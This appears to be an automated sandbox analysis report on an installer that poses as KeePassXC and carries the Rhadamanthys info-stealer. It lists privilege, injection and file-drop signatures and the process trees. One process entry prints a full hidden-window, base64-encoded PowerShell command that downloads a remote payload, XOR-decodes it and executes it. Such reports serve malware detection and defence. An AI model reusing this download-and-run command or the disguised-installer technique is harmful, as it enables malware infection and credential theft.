| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 51A3AC4FF8095876459BB49781BDF4DF
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss3BD3.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi3BD0.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr3BD1.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr3BD2.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
"C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBzAHUAbgAuAG0AbwBuAHMAdABlAHIALwAyADUAMAA1ADMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3492 -ip 3492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 964
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe"
C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe
"C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe"
\??\c:\st\Autoit3.exe
"c:\st\Autoit3.exe" c:\st\script.a3x
\??\c:\windows\SysWOW64\cmd.exe
"c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\bakfgfa\ffcfhbc
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic ComputerSystem get domain
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-01 21:53
Reported
2024-06-01 22:11
Platform
win11-20240508-en
Max time kernel
91s
Max time network
136s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1080 created 2064 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1496 set thread context of 1080 | N/A | C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\e574100.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42A7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42C9.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI5598.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e574104.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF897ACE000E9856D6.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e574100.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF4508B638EFDABC96.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42F9.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{BFB3A06C-96C7-42C4-A90F-78C892A36FF8} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFC3EF3208FE0EAA83.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI41DB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42E9.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFCE8E4D867C59CEE8.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42B8.tmp | C:\Windows\system32\msiexec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe | N/A |
Loads dropped DLL
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C4246E35669DDEF460F00052F5831FC6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss4346.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi4343.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr4344.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr4345.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
"C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1496 -ip 1496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1496 -s 924
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1080 -ip 1080
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 1080 -ip 1080
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1080 -ip 1080
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1776
Network
Files
C:\Windows\Installer\MSI41DB.tmp
C:\Windows\Installer\MSI42F9.tmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tx4xnijq.sff.ps1
C:\Users\Admin\AppData\Local\Temp\pss4346.ps1
C:\Users\Admin\AppData\Local\Temp\scr4344.ps1
C:\Users\Admin\AppData\Local\Temp\msi4343.txt
C:\Config.Msi\e574103.rbs
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
C:\Windows\Installer\e574100.msi
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgcc_s_dw2-1.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Network.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Gui.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgpg-error-0.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libicuin68.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libyubikey-0.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libzstd.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libjson-c-2.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libpcre2-16-0.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libicuuc68.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Widgets.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libdouble-conversion.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libwinpthread-1.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\zlib1.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libykpers-1-1.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libsodium-23.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libquazip5.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Svg.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Core.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Concurrent.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libqrencode.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgcrypt-20.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libstdc++-6.dll
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libssp-0.dll